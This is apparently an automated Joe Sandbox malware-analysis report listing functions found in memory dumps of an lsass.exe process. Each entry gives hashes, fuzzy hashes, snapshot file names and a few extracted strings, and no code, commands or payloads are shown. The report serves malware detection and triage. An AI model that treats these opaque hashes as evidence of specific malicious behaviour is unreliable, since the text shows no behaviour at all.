Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aedc15860473d66294bcd7d30928d416fab4d432e3251ec394bf809f57ce886
Instruction ID: 2b5f8539aa83c294907a52e2e8c51086a76859ff4927a3d2ed4f1cf29778dfe4
Opcode Fuzzy Hash: 1aedc15860473d66294bcd7d30928d416fab4d432e3251ec394bf809f57ce886
Instruction Fuzzy Hash: B701BC34A0E38D9FE721DBA488A419CBFB1AF02700F1541E7C088CB1A2D9782A448754

Function 00007FFD9BAC8E0E Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72e8d9ce8939ada8daf97852702da57a1e0221aec448b458bae29d5719783844
Instruction ID: 4c7eb7cd99421f110bd073594e3329c82d544306a91dd9317140f595db3c4a04
Opcode Fuzzy Hash: 72e8d9ce8939ada8daf97852702da57a1e0221aec448b458bae29d5719783844
Instruction Fuzzy Hash: DCF0FF30B0981D8BF769F748C8A57B83392EB98320F024179D40EC72E2DE6C6E418780

Function 00007FFD9BE9E989 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01e6a530534f018d3b2ee66dd8af7d64d4247341198ed03ea6f2d9d0b6add2d2
Instruction ID: a652f649263d053454e2d5d0a71f3f28001c328d825d105400285af0b1bac241
Opcode Fuzzy Hash: 01e6a530534f018d3b2ee66dd8af7d64d4247341198ed03ea6f2d9d0b6add2d2
Instruction Fuzzy Hash: 66F0E521B0DF880FC76A566D4869061BFF1DF6A51134A43EFC045CB6B3ED59AC89C342

Function 00007FFD9BAA32CD Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
Instruction ID: 0a2fa89e7e0d5747494ddef0842e7392d38e43ee3c4e0df416cc6856fdda74ef
Opcode Fuzzy Hash: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
Instruction Fuzzy Hash: D7F0E630B0A91E8AEBB4DB54CC547B873A2EF54311F1141B6C40ED31B1DEB86EC58B54

Function 00007FFD9BAB4A9A Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a72897bfa2d5ed790c4da001a0ba0107c464fbca613f003c8cc343423831275
Instruction ID: 14dfd54124fb23c1bfc045ebbd9f176678ed5627f88e118182b41b1c667b7e1f
Opcode Fuzzy Hash: 7a72897bfa2d5ed790c4da001a0ba0107c464fbca613f003c8cc343423831275
Instruction Fuzzy Hash: F1F0B430B0D52E4BFB649B88A8606B93290FF01310F1245BCD45EC31F7DD78AA414B84

Function 00007FFD9BAA0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09bed51a84c8659b2e94871270fad55b8b9426c8566189d6f2baa9fe026836bc
Instruction ID: 5a485b8274835d9c3335894b93f793446f39198f4132d1a56ab01eaaa1494254
Opcode Fuzzy Hash: 09bed51a84c8659b2e94871270fad55b8b9426c8566189d6f2baa9fe026836bc
Instruction Fuzzy Hash: 49F0553560DA4ACFDB40AB38ECA18D0BB60EB46208B5611EAC088C70A3E250195CC700

Function 00007FFD9BE9273A Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83e203b8e896b3d77ad03fe1b179139441bbce6615a2dd4495b200fa47d7f963
Instruction ID: 79df24b6327bd82756927ca7257cf5cc40a6714b3b601b890e14c2101ab5199b
Opcode Fuzzy Hash: 83e203b8e896b3d77ad03fe1b179139441bbce6615a2dd4495b200fa47d7f963
Instruction Fuzzy Hash: 5FF09021A0E38A4FEF765AF44CA15B83BD0EF2734071A47FAC489DB1E7D56876098721

Function 00007FFD9BACCFC9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a47b6b63f38ab02bf2acb23ffa2af692cf7bb9b26995557b301c6c61529f5627
Instruction ID: e9657ef71deb6a571a23848cafe0b9fd4689874064f2e25657937268aa92f06e
Opcode Fuzzy Hash: a47b6b63f38ab02bf2acb23ffa2af692cf7bb9b26995557b301c6c61529f5627
Instruction Fuzzy Hash: EDF0306155E7C40FD312AB388C255547FA0EA1720535B05EBC0C9CB4B3D94A485AC702

Function 00007FFD9BEA0F69 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b2a8bba450a9726d66d1234c38823b011464835f4cac18be1516857b738b910
Instruction ID: f377eb49a8a20e5c4cc2d44dd1f13493591738e5b831be51da5b74f6d30ac8fe
Opcode Fuzzy Hash: 6b2a8bba450a9726d66d1234c38823b011464835f4cac18be1516857b738b910
Instruction Fuzzy Hash: 83E0D820709B884FC70E56388C695507FB1EB6710238A02DBD005CB2A3ED19DCC9C741

Function 00007FFD9BAA32A4 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
Instruction ID: 94a44058782c04311fa8ec512bb0c1704cef5a4e1f9f533843700eb2b5e94c0a
Opcode Fuzzy Hash: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
Instruction Fuzzy Hash: 55F05420B0A50E4AEBB4DB84C8A46B97393EF54311F114176C40ED71F2CE696E458A50

Function 00007FFD9BAB5E7E Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0de9ab2d1e1d3ba4a9ad91d39114f45ac3c7a91d9e7c9e7e595d5d05dc638dd9
Instruction ID: a0f0d90a2913f9d276332e5d6a767ba9a5c17e2b208e17fabeaa07f7c8cefb6e
Opcode Fuzzy Hash: 0de9ab2d1e1d3ba4a9ad91d39114f45ac3c7a91d9e7c9e7e595d5d05dc638dd9
Instruction Fuzzy Hash: BBE06D31E1E52D8AEB74A784D8706F8B321EF44321F6100B6C41EA7591DAAA3A828E40

Function 00007FFD9BAB6D91 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ce8756cb5db0def1e10c7de3dda3c5f6772232c460d81b9dd9c9dff72e4d0ec
Instruction ID: 4ae678700cc8e8fd13ed504ed9a815ad3245d0119d431339418e2a7ee954e226
Opcode Fuzzy Hash: 8ce8756cb5db0def1e10c7de3dda3c5f6772232c460d81b9dd9c9dff72e4d0ec
Instruction Fuzzy Hash: 68F08220F1F52E46F6B4679488343B87252AF00310F5602B6D42D961E3DE9D3E808E01

Function 00007FFD9BAA4856 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b7aa61fd468428829799d00443e93c2baae9e3b281f0f70c77712afb74089e0
Instruction ID: 923dda69e58bf11382a5eb1bff07c12877da131f6a31a7f4c66a23754f2b3916
Opcode Fuzzy Hash: 3b7aa61fd468428829799d00443e93c2baae9e3b281f0f70c77712afb74089e0
Instruction Fuzzy Hash: F7E08611F1D50907F67856FCA4392B56383EB88B10F124175E44EC33E2ECBC69430155

Function 00007FFD9BAA16B0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4b8c8cb5007268f78eaa466d14c96a68735b97058f301e4e398b59e125c1059
Instruction ID: e6345f37c77d078c8dff598482f6ca69cc302ba28a0d1fc8aa3ae9b7608c4101
Opcode Fuzzy Hash: c4b8c8cb5007268f78eaa466d14c96a68735b97058f301e4e398b59e125c1059
Instruction Fuzzy Hash: 68E09231B0851A8BF7299744C8B07B873A6EB94300F1641BCD94FD36F1DDB8AE018699

Function 00007FFD9BE9F732 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aa00d790216fd91a99a5a63446b1a8fe34be649959d813ccd1bdce3c028203d
Instruction ID: 46d414f990e5fe325397922df83b8824c2b09586744d3d355c030d171a7074e1
Opcode Fuzzy Hash: 3aa00d790216fd91a99a5a63446b1a8fe34be649959d813ccd1bdce3c028203d
Instruction Fuzzy Hash: 51E04F20B0EA0E87E6306B8484B06B8324ADB94351F110335C40A862F3CD6D766902C0

Function 00007FFD9BE9F6FF Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bbe65a9f8a1dde05c526dd67553ccd80477e366b836c4d35e7b26fdeb78be67
Instruction ID: 680cbb86b3fbd15af342b029d0c556d9495ebc246fbe4bcaa31072f24ca6b707
Opcode Fuzzy Hash: 1bbe65a9f8a1dde05c526dd67553ccd80477e366b836c4d35e7b26fdeb78be67
Instruction Fuzzy Hash: D3D0A730B0DA0E87E330A740C4E49F93355D790351F114335C006862F6CD7DB66446C4

Function 00007FFD9BAA0550 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc12b17141c62a5e7bf2f6d95bec8da8d12e48d0a23b650481b9dd49e2b4399d
Instruction ID: 188f07be771cfbdd23715cdda7aa701b4aaa7cabf879f7eb9af9b68046b52bd6
Opcode Fuzzy Hash: bc12b17141c62a5e7bf2f6d95bec8da8d12e48d0a23b650481b9dd49e2b4399d
Instruction Fuzzy Hash: F6C08011E6FA4911D65457750CB241034C15B4E304BC701E8D54C802E1EC8D15558145

Function 00007FFD9BAA06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
Instruction ID: 9a2e969648b5b8e455ef805bf44c71f79e16c2b759d97fefd7bf251fb2ed1667
Opcode Fuzzy Hash: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
Instruction Fuzzy Hash: 65C00205F5B51E01E53573EA54660BDA2425BD5E54FD70172D50C800A198DD22D9026A

Function 00007FFD9BE9323B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
Instruction ID: ce06c023ad015b5703b7c244815dbfcd98b5df33d04e39c89c9765c82061c9b2
Opcode Fuzzy Hash: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
Instruction Fuzzy Hash: 68D0C914B1F65F85F23B4AC1407423E51A85F45700E23413EC09F419F1CD1F7B096601

Function 00007FFD9BAA520E Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c07fcd751d40f9919b02ea0cd9645cc1693f3bb19da6422d826d1c49477c6e3
Instruction ID: 1a35050766e590f1307e54011fcb85caf187bb49c43eeddd83dd8bc5d87a3cba
Opcode Fuzzy Hash: 3c07fcd751d40f9919b02ea0cd9645cc1693f3bb19da6422d826d1c49477c6e3
Instruction Fuzzy Hash: FCC08C00F0881A13F25A330C042163D00438F8471CFD54074E82FC63CECE0C1A0102C6

Function 00007FFD9BE9324E Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b273a1a08826d1b8bc1d61c548047a97ae9cd01490883ee88b36607296e47a
Instruction ID: 763d6fbb1f910c7d5a9d80f8f9722831c523bfee21d4ec3c3f37fc0ee2196731
Opcode Fuzzy Hash: 23b273a1a08826d1b8bc1d61c548047a97ae9cd01490883ee88b36607296e47a
Instruction Fuzzy Hash: DEC08C20A0E24B8FF337479480392393764AF46304F2340BAC44E8A8F6CD2A3B099611

Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
Instruction ID: 23c1ab6935c2875efbf1a70c7ea36ce8b5266d16010fde7bd8eb8d4906734a1f
Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
Instruction Fuzzy Hash: B0B01200D5740F00E43433FA089207970415B44200FC20070D40C8009198CD32D80367

Non-executed Functions

Function 00007FFD9BAA09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FFD9BAA0B3E
c9, xrefs: 00007FFD9BAA0B56
"s9, xrefs: 00007FFD9BAA0B46
!k9, xrefs: 00007FFD9BAA0B4E

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: f55fb42346b907c0464accb34b153e20408966f01eb438533c853ee5b221f10f
Instruction ID: b33f58bc7fd9925b00184f98466e5a05b79c2144674a0d83844a67e63aec78ad
Opcode Fuzzy Hash: f55fb42346b907c0464accb34b153e20408966f01eb438533c853ee5b221f10f
Instruction Fuzzy Hash: 4141CD17B0842745E239B3FD78219E95B408FA823FB0847B3F55E8D0C78C082486C2E9

Analysis Process: lsass.exePID: 5804, Parent PID: 2724COMMON

Executed Functions

Function 00007FFD9BAB0D47 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

5Z_H, xrefs: 00007FFD9BAB0DF3

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: 865b668df4a679c3d222d30438e9f1d025188adbf56b46d10ea893e8ff090c75
Instruction ID: 35080390a441019a48a973ddf97c7b3542efc0861d6719980894010a90c75027
Opcode Fuzzy Hash: 865b668df4a679c3d222d30438e9f1d025188adbf56b46d10ea893e8ff090c75
Instruction Fuzzy Hash: E3911471A09ADD4FE769DB6888397A87FE1FF55314F4001BED099C72E6CBB818048B00

Function 00007FFD9BAB1171 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28218c442d0edae88ca4dbfdcc4480e3ff11d3dfd0cc602070bc0ca491876614
Instruction ID: 803c9b1af00525ae78d172053851e9f0baefdd1fede826b18054a60da718a798
Opcode Fuzzy Hash: 28218c442d0edae88ca4dbfdcc4480e3ff11d3dfd0cc602070bc0ca491876614
Instruction Fuzzy Hash: A1B10531A0965D8FDB58EF68D855AE97BE0FF1A310F0141BFD45EC72A2CA74A841CB81

Function 00007FFD9BEA3D58 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BEA3DD2

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8aeab6326c047d25cecf7ddbae4d6dfda05934276e49fbe667e04110477fc972
Instruction ID: 5fb0d2af20f350d9d902e3ba63b99c8e4c68ea58e36d34718a641ec8abea3f51
Opcode Fuzzy Hash: 8aeab6326c047d25cecf7ddbae4d6dfda05934276e49fbe667e04110477fc972
Instruction Fuzzy Hash: FF412B71E0960E9FDB5ADF94C4A15BDBBB5FF48304F1140BAD01AA72A6CB396A01CB10

Function 00007FFD9BEB17D9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BEB17F6

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 561e4333ff88aae07d3f20678f624a23317f75b9b839d12ff1309a26a088dfea
Instruction ID: a06ecdc61bb48b5d4f3855a9795dc5dca9a6addd411e89c0547985577842f719
Opcode Fuzzy Hash: 561e4333ff88aae07d3f20678f624a23317f75b9b839d12ff1309a26a088dfea
Instruction Fuzzy Hash: 91F0E56190F3D04FCB1A9A3588288147FA0EE2325074A42EFC095CF1A3DA1CC885C711

Function 00007FFD9BEB1A19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BEB1A36

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: a13767faad38018a8c398e0a503823e34544ae146c07a1b535f74ac0feed286b
Instruction ID: 1156787aa9f14a2ba2f82b0063e7e76663150d2d8543ac0d35cecb1882d9e0f1
Opcode Fuzzy Hash: a13767faad38018a8c398e0a503823e34544ae146c07a1b535f74ac0feed286b
Instruction Fuzzy Hash: 16E01A6155F7D44FCB1AEB7488799487FA0AF6721078B40EEC185CF1B3E62E9849C702

Function 00007FFD9BEB0FF9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BEB1016

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: daee4fc830ecf8498c5db4314a0a8b67921098988d73832f88646c6644948511
Instruction ID: 747938b54df2ee11ef7ab78e720ec2fa1768cc883d02eb2579ca91bbb3114ad7
Opcode Fuzzy Hash: daee4fc830ecf8498c5db4314a0a8b67921098988d73832f88646c6644948511
Instruction Fuzzy Hash: DAE01AA154F7D44FCB1AEB74887A8447FA1AE6731178B41EEC186CF1B3E62E8849C701

Function 00007FFD9BC11DBA Relevance: .7, Instructions: 749COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2128757439.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bc10000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9c58ef264d4f702f1f2c66028c4e5202ee344190737da4b534128841e2334ed
Instruction ID: aefa83b2d5098f9d615a484a31589f298fa638008aacb9dba33d8ede74555dde
Opcode Fuzzy Hash: c9c58ef264d4f702f1f2c66028c4e5202ee344190737da4b534128841e2334ed
Instruction Fuzzy Hash: 4C528171E1DA9D4FDB98EB58C8A1EA8B7E1FF68354F0401E9E04DD7292CA357980CB41

Function 00007FFD9BEA3F59 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 512342c5d2f11ac5856bb1c812069b5b80b56189beed69167b102704f1232421
Instruction ID: 7965bd988b5a6d90d9dcd12e0403425a217cee181a4fd3ef41d8af1c1dc2d65e
Opcode Fuzzy Hash: 512342c5d2f11ac5856bb1c812069b5b80b56189beed69167b102704f1232421
Instruction Fuzzy Hash: 52C1E37061A6098FEB59CF44C0E16B53BB5FF54311B5142BDC84ACB29BD739E981CB81

Function 00007FFD9BEA1247 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36ceb3140990f8c67ee919ba54ee94cd60f51004e3ab408b8f22c57fe285deb
Instruction ID: 19a5cddcba63515e5fa6ef3dd101043ea8956d888ccbec207ad8fb4dcb397c73
Opcode Fuzzy Hash: e36ceb3140990f8c67ee919ba54ee94cd60f51004e3ab408b8f22c57fe285deb
Instruction Fuzzy Hash: 9E21E892F0F1AB86F67555ED24310FC6B4C6F46334F1A06B6D49D850E2DC0E2681D293

Function 00007FFD9BEA0EF9 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31adf167e25326fd6655521bf4dcaa3915c16cd3d0f702c5676cd8b9f1a8c9ba
Instruction ID: 8104d74edf57e2087f0f82fda6cd5e164bd8d29cbb913ff0aa837130a5d4142b
Opcode Fuzzy Hash: 31adf167e25326fd6655521bf4dcaa3915c16cd3d0f702c5676cd8b9f1a8c9ba
Instruction Fuzzy Hash: 1891AE75B0E58D4FE774DA5888679F437D8FF45320B0602BAD09EC71B3D919A906C782

Function 00007FFD9BEA2DB6 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cf7272c9cc9ad20bc4a7136a611d6b361657ea7ff3e0b349d1238d1f11a9511
Instruction ID: 79dd083480b2f3b8fff43092afe271157d2e00193725a0e327021919dda89dc7
Opcode Fuzzy Hash: 7cf7272c9cc9ad20bc4a7136a611d6b361657ea7ff3e0b349d1238d1f11a9511
Instruction Fuzzy Hash: 3581ADB1B0EB498FE3398BA8856157577E8FF45310B16057ED48FD32A3CE2AB5428742

Function 00007FFD9BEA402B Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7a9df0dab9b942be40073dc41d9b244638ea6decd61d6f7a9a209a2601d7577
Instruction ID: b2da312137a996d0406acaadb1d059f6d2356f45983d632e771fbd9211b33648
Opcode Fuzzy Hash: b7a9df0dab9b942be40073dc41d9b244638ea6decd61d6f7a9a209a2601d7577
